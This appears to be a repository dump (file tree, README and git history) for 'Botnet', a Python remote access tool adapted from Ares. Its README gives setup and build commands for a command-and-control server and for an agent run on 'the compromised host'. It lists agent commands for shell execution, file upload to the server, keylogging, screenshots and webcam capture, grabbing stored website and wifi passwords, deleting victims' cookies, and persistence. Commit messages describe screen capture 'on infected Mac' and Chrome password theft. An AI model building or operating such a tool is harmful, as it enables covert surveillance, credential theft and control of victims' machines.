======================: FILES :======================
Botnet
├── agent
│   ├── agent.py
│   ├── build.py
│   ├── config.py
│   └── passwords.py
├── README.md
├── requirements.txt
└── server
    ├── API
    │   ├── GeoIP.dat
    │   └── __init__.py
    ├── config.py
    ├── models.py
    ├── server.py
    └── WebUI
        ├── __init__.py
        ├── Static
        │   ├── css
        │   │   ├── github-dark.css
        │   │   └── stylesheet.css
        │   ├── images
        │   │   └── bkg.png
        │   └── js
        │       └── jquery.md5.js
        └── Templates
            ├── agent_console.html
            ├── agent_detail.html
            ├── agent_list.html
            ├── create_password.html
            ├── footer.html
            ├── header.html
            ├── index.html
            └── login.html

9 directories, 24 files
======================: README CONTENT :======================
# Botnet
Botnet is a Python3 Remote Access Tool.

__Warning: Misuse of this software can raise legal and ethical issues which I don't support nor can be held responsible for.__

Botnet is, just like Ares, made of two programs:

- A Command And Control server which is a web interface to administer the agents
- An agent program, which is run on the compromised host, and ensures communication with the C&C

## Based on Github project Ares: https://github.com/sweetsoftware/Ares
Differences?
1. Updated from python 2 -> python 3
2. Extra features like screencaptures, webcam capture, keylogger, password grabber (websites and wifi), ...

## Setup

__Note: I suggest creating a virtual environment__

Install the python requirements: 

```
pip install -r requirements.txt
```

Initialize the database:

```
cd Server
./server initdb
```

## Server
Run the (debug) server:

```
./server.py runserver -h 0.0.0.0 -p 8080 --threaded
```

The server must now be accessible on http://localhost:8080

## Agent
Run the agent (update config.py to suit your needs):

```
cd agent
./agent.py
```

Build an agent to a standalone library and run it:

```
./builder.py -p Linux --server http://localhost:8080 -o agent
./agent
```

To see a list of supported options run

```
./builder.py -h
```

## Commands

```
<any shell command>
Executes the command in a shell and return its output.

upload <local_file>
Uploads <local_file> to server.

download <url> <destination>
Downloads a file through HTTP(S).

zip <archive_name> <folder>
Creates a zip archive of the folder.

python <command|file>
Runs a Python command or local file.

screenshot
Takes a screenshot and uploads the image to server.

camshot
Takes a webcam image and uploads the image to server.

keylogger
Shows all pressed keys since start up.

passwords
Shows all stored passwords on the pc, including websites and wifi.

delete passwords
Deletes all stored cookies from the victims' pc. 
This way you could try to retreive password from keylogs if you cannot get them from the passwords command.

persist
Installs the agent.

clean
Uninstalls the agent.

exit
Kills the agent.
```
====================== GIT HISTORY: ======================
9bd6407 HEAD@{0}: clone: from https://github.com/frederikme/Botnet
commit 9bd6407992c6b41db56ca1065e05e21a398e64b4
Author: Frederik <60892381+frederikme@users.noreply.github.com>
Date:   Mon Mar 8 12:14:12 2021 +0100

    Update models.py

commit 9cdd1f9c6e857cfd5a3ade87254918d513c24f48
Author: Frederik Mees <Fredjemees@gmail.com>
Date:   Fri Aug 28 11:43:49 2020 +0200

    small renaming adjustments

commit 56ce056c490579badf374a47b4a145a7347f7a24
Author: Frederik Mees <Fredjemees@gmail.com>
Date:   Thu Feb 20 17:43:30 2020 +0100

    Renaming

commit f0ec3078ac16f1b22e80fe6cee6716b4203a9fae
Author: Frederik Mees <Fredjemees@gmail.com>
Date:   Thu Feb 13 17:30:33 2020 +0100

    issue1

commit 4013ed84e6a8edcaf52fe7297404e40938b1032e
Author: Frederik Mees <Fredjemees@gmail.com>
Date:   Wed Feb 12 20:47:55 2020 +0100

    Adding documentation

commit 891e11398cdad6c991fed3a49ca791ab3fa6e6fd
Author: Frederik Mees <Fredjemees@gmail.com>
Date:   Wed Feb 12 20:47:33 2020 +0100

    renaming the agent

commit 8a0bcb64698e8e7732db8f9e0fb7be86c8d5b087
Author: Frederik Mees <Fredjemees@gmail.com>
Date:   Wed Feb 12 20:15:49 2020 +0100

    small adjustments

commit 80f85730339ee2c1c092f2c9d1a299e2cf34e37c
Author: Frederik Mees <Fredjemees@gmail.com>
Date:   Wed Feb 12 19:49:22 2020 +0100

    wifi_passwords bugfix Windows

commit 3b66ecbf2b20c88e22f1631cdcc2b7531e5f0122
Author: Frederik Mees <Fredjemees@gmail.com>
Date:   Wed Feb 12 19:28:16 2020 +0100

    added access to wifi passwords

commit 85c9a21616608fb33d9fc205cc94abf548b1aeec
Author: Frederik Mees <Fredjemees@gmail.com>
Date:   Wed Feb 12 12:58:08 2020 +0100

    updated with possible commands

commit c8b9e11d04704e1711f47faf72822c4da3874ee5
Author: Frederik Mees <Fredjemees@gmail.com>
Date:   Tue Feb 11 22:29:17 2020 +0100

    small edit

commit 04355982bbce256c55a5436532043027a99c941b
Author: Frederik Mees <Fredjemees@gmail.com>
Date:   Tue Feb 11 22:24:59 2020 +0100

    Bugfix passwords chrome fetching

commit 63ce41e9d22bb2469e5d326512a473fc9e69409c
Author: Frederik Mees <Fredjemees@gmail.com>
Date:   Tue Feb 11 22:10:29 2020 +0100

    small bugfix - fetch stored passwords from Chrome

commit 794758883cddc13cd9b36f96c568240c63f19a09
Author: Frederik Mees <Fredjemees@gmail.com>
Date:   Tue Feb 11 20:31:08 2020 +0100

    fetch passwords stored from Chrome

commit f4afcf0d7f69888d682227c494cf034cb8c63709
Author: Frederik Mees <Fredjemees@gmail.com>
Date:   Tue Feb 11 20:07:10 2020 +0100

    updated

commit cee55b27a36ae62dc4e23a8761c877904d5ea4b7
Author: Frederik Mees <Fredjemees@gmail.com>
Date:   Tue Feb 11 20:06:02 2020 +0100

    Camera Capture feature

commit 8bbe202d2f6b446658562bac90ce70c218f73e98
Author: Frederik Mees <Fredjemees@gmail.com>
Date:   Tue Feb 11 19:30:40 2020 +0100

    Added camera capture as camshot

commit ddcab279bf8c46f2555e2439a9df43af62f2154b
Author: Frederik Mees <Fredjemees@gmail.com>
Date:   Tue Feb 11 19:28:27 2020 +0100

    Added opencv for camera capture

commit 2704d0b308c8952ebf3d305d3d0af2686c8e580d
Author: frederikme <60892381+frederikme@users.noreply.github.com>
Date:   Tue Feb 11 19:08:29 2020 +0100

    Update README.md

commit a8874e7eac1b8b5128d83f44ec8da27aa4a05b40
Author: frederikme <60892381+frederikme@users.noreply.github.com>
Date:   Mon Feb 10 21:55:00 2020 +0100

    Update README.md

commit e27c1c61316902551b784064d1d972d68c28853a
Author: frederikme <60892381+frederikme@users.noreply.github.com>
Date:   Mon Feb 10 21:51:02 2020 +0100

    Update README.md

commit 4820ace5f864dae82ac92fc26eaefdf50b35f65c
Author: frederikme <60892381+frederikme@users.noreply.github.com>
Date:   Mon Feb 10 21:35:31 2020 +0100

    Update README.md

commit 80807706d931ee3ab8cd6b147bd46d6dd1d922f9
Merge: 9c7cd47 b129ccc
Author: Frederik Mees <Fredjemees@gmail.com>
Date:   Mon Feb 10 21:32:18 2020 +0100

    Merge branch 'master' of https://github.com/frederikme/Python_botnet

commit 9c7cd4768a1d5f23067ca25e628c74b3055b3abd
Author: Frederik Mees <Fredjemees@gmail.com>
Date:   Mon Feb 10 21:30:27 2020 +0100

    Keylogger adjustments

commit cb18e0595b47f71b2d9780b81f1d9a8067bf9610
Author: Frederik Mees <Fredjemees@gmail.com>
Date:   Mon Feb 10 21:14:48 2020 +0100

    Added pynput requirement for keylogger

commit c7dcfa9ab0c26565ef24f2672179e3bbfc9f9486
Author: Frederik Mees <Fredjemees@gmail.com>
Date:   Mon Feb 10 21:13:57 2020 +0100

    Added keylogger

commit 1d271c5400116e8a6298310ba0fa4ce4575dc976
Author: Frederik Mees <Fredjemees@gmail.com>
Date:   Mon Feb 10 21:04:26 2020 +0100

    Screencapture on infected Mac added

commit b129cccc47633b3017ed8f2e630bfea47ff62321
Author: frederikme <60892381+frederikme@users.noreply.github.com>
Date:   Mon Feb 10 20:15:11 2020 +0100

    Create README.md

commit aa2ee48c686a35f7b10669c86c86dfb28bf1b84a
Author: Frederik Mees <Fredjemees@gmail.com>
Date:   Mon Feb 10 19:34:13 2020 +0100

    First commit
